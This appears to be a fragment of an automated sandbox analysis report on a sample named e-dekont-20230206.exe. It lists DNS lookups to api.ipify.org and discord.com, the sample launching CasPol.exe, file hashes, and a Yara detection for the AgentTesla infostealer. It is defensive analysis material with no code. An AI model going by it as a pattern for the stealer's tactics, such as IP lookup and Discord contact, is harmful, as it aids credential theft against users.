                    Feb 7, 2023 18:41:27.209341049 CET | 8.8.8.8 | 192.168.2.5 | 0x302e | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.209341049 CET | 8.8.8.8 | 192.168.2.5 | 0x302e | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.244609118 CET | 8.8.8.8 | 192.168.2.5 | 0x612d | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.244609118 CET | 8.8.8.8 | 192.168.2.5 | 0x612d | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.244609118 CET | 8.8.8.8 | 192.168.2.5 | 0x612d | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:27.244609118 CET | 8.8.8.8 | 192.168.2.5 | 0x612d | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.159280062 CET | 8.8.8.8 | 192.168.2.5 | 0x8350 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.159280062 CET | 8.8.8.8 | 192.168.2.5 | 0x8350 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.159280062 CET | 8.8.8.8 | 192.168.2.5 | 0x8350 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.159280062 CET | 8.8.8.8 | 192.168.2.5 | 0x8350 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                    Feb 7, 2023 18:41:32.159280062 CET | 8.8.8.8 | 192.168.2.5 | 0x8350 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                    • api.ipify.org
                    • discord.com


                    Target ID:0
                    Start time:18:41:24
                    Start date:07/02/2023
                    Path:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\Desktop\e-dekont-20230206.exe
                    Imagebase:0x22e8d880000
                    File size:695808 bytes
                    MD5 hash:33A5F92DEEE382035467CAFF29A8D487
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:low

                    Target ID:1
                    Start time:18:41:25
                    Start date:07/02/2023
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                    Imagebase:0xc80000
                    File size:107624 bytes
                    MD5 hash:F866FC1C2E928779C7119353C3091F0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Yara matches:
                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:moderate

                    No disassembly